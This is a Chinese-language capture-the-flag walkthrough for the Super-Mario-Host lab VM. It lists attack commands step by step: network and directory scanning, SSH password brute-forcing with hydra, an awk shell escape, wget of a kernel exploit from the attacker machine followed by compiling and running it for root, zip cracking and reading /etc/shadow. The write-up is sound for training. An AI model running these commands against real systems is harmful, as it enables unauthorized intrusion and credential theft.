&&uper-Mario-Host(超级玛丽)&&
&&信息收集&&
1.确认主机ip
nmap 192.168.99.0/24
详细信息和隐藏ip
nmap -A -p- 192.168.99.25
80端口被改成8180端口
访问8180端口
目录扫描
dirb http://192.168.99.25:8081 /usr/share/dirb/wordlists/big.txt
爆出两个目录
/server-status/访问(拒绝访问)
/vhosts/获得一些敏感信息
我们访问一下这个域名,没解析出来
看了大神的文章好像要在本地hosts文件添加192.168.99.25 mario.supermariohost.local 这样才能进行解析
windows:在C:\Windows\System32\drivers\etc\hosts
linux:在/etc/hosts
在末尾加上ip加域名就可以解析访问了
&&web渗透&&
访问成功
目录爆破
/luigi.php
/command.php
cewl 密码生成字典
cewl http://mario.supermariohost.local:8180/luigi.php -w user.txt
john在user字典上生成相应的社工密码字典
john --wordlist=user.txt --stdout --rules > password.txt +
hydra暴力破解
hydra -L user.txt -P passwd.txt ssh://192.168.99.25 -t 20
ssh登入
ssh luigi@192.168.99.25
ls在这个下面貌似有条消息
cat看看
这是暗示我们要扩展使用权限么
有一个awk
提权命令
awk ‘BEGIN {system("/bin/bash")}’
得到一个普通用户使用权限
uname -a 这个版本内核貌似有漏洞
&&提权&&
serchsploit linux 3.13.0
将其拷贝到www目录下,开启apache服务
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html/37292.c
靶机切换到tmp目录下,下载exp到tmp下
wget http://192.168.99.6/37292.c /tmp/37292.c
编译下载的exp,并且运行
gcc 37292.c -o exp2
./exp2
获得管理员权限
交互式shell
python -c ‘import pty;pty.spawn("/bin/bash")’
解压flag.zip发现需要密码
将这个包放到/var/www/html下,并且下载在攻击机下
攻击机下载
fcrackzip压缩包破解
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip
密码破解为ilovepeach,破解成功
查看flag.txt
这flag.txt的意思是拿下靶机所有用户的明文密码
cat /etc/shadow
·